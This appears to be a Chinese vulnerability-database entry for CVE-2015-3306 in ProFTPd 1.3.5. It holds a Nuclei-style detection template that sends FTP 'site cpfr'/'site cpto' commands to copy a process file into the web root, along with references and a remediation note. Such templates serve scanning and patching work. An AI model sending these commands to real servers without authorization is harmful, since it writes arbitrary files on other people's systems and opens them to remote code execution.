CVE-2015-3306: ProFTPd - Remote Code Execution

日期: 2025-08-01 | 影响软件: ProFTPd | POC: 已公开

漏洞描述

ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.

PoC代码[已公开]

id: CVE-2015-3306

info:
  name: ProFTPd - Remote Code Execution
  author: pdteam
  severity: critical
  description: ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code with the privileges of the ProFTPd process.
  remediation: Upgrade to ProFTPD 1.3.5a / 1.3.6rc1 or later.
  reference:
    - https://github.com/t0kx/exploit-CVE-2015-3306
    - https://www.exploit-db.com/exploits/36803/
    - http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157053.html
    - http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157054.html
    - https://nvd.nist.gov/vuln/detail/CVE-2015-3306
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
    cvss-score: 10
    cve-id: CVE-2015-3306
    cwe-id: CWE-284
    epss-score: 0.9393
    epss-percentile: 0.9987
    cpe: cpe:2.3:a:proftpd:proftpd:1.3.5:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: proftpd
    product: proftpd
    shodan-query: cpe:"cpe:2.3:a:proftpd:proftpd"
  tags: cve2015,cve,network,ftp,rce,proftpd,edb,tcp,vuln
tcp:
  - host:
      - "{{Hostname}}"
    port: 21
    inputs:
      - data: "site cpfr /proc/self/cmdline\r\n"
        read: 1024

      - data: "site cpto /tmp/.{{randstr}}\r\n"
        read: 1024

      - data: "site cpfr /tmp/.{{randstr}}\r\n"
        read: 1024

      - data: "site cpto /var/www/html/{{randstr}}\r\n"
    read-size: 1024
    matchers:
      - type: word
        part: raw
        words:
          - "Copy successful"
# digest: 490a0046304402206fa568a0868470a504af9fccfef619f25ed74491a8a8a4affd4bc0d087fc850802204a9ecd0af5c7104c37fec655352b3f7a3bfd14e721836389a2364e4b8d6211d6:922c64590222798bb761d5b6d8e72950

相关漏洞推荐